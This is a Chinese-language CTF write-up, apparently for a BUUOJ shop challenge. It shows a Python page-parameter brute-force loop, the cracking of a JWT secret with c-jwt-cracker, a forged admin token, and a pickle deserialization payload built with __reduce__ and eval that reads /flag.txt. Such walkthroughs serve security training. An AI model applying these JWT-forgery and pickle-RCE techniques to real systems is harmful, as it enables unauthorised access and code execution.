知识点:pickle ,jwt 伪造,爆破密钥
有 page
参数爆破一下,在 181 页有 lv6。
import requests
url = 'http://35a050dd-3910-4ff7-a152-cfd976289c2b.node4.buuoj.cn:81/shop?page='
for i in range(1000):
req = requests.get(url=url+str(i))
if 'lv6.png' in req.text:
print(i)
break
在结算处可以改折扣数,但不知道为什么不能白嫖
访问 /b1g_m4mber
熟悉的页面,直接看 cookie
嗯,考点很显眼
这边无签名攻击行不通了,看了 wp 才知道可以爆破密钥
使用 c-jwt-cracker 爆破
到 c-jwt-cracker 目录下直接 make,如果显示如下报错。
运行如下命令
sudo apt-get update
sudo apt-get install libssl-dev
最后 make
使用 密钥 1Kun 加密 ,修改 username 为 admin
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.40on__HQ8B2-wM1ZSwax3ivRK4j54jlaXv-1JjQynjo
以 admin 访问后,在网页源码处有提示,有个源码压缩包
在 setting.py 处有提示,告诉我们有后门
最后在 Admin.py 里看到一个 pickle 反序列化漏洞
os.system和os.popen 都用不了,最后看来大佬们的使用 eval
import pickle
import urllib.parse
class exp(object):
def __reduce__(self):
return (eval,("open('/flag.txt').read()",))
a=exp()
s=pickle.dumps(a,protocol=0)
print(urllib.parse.quote(s))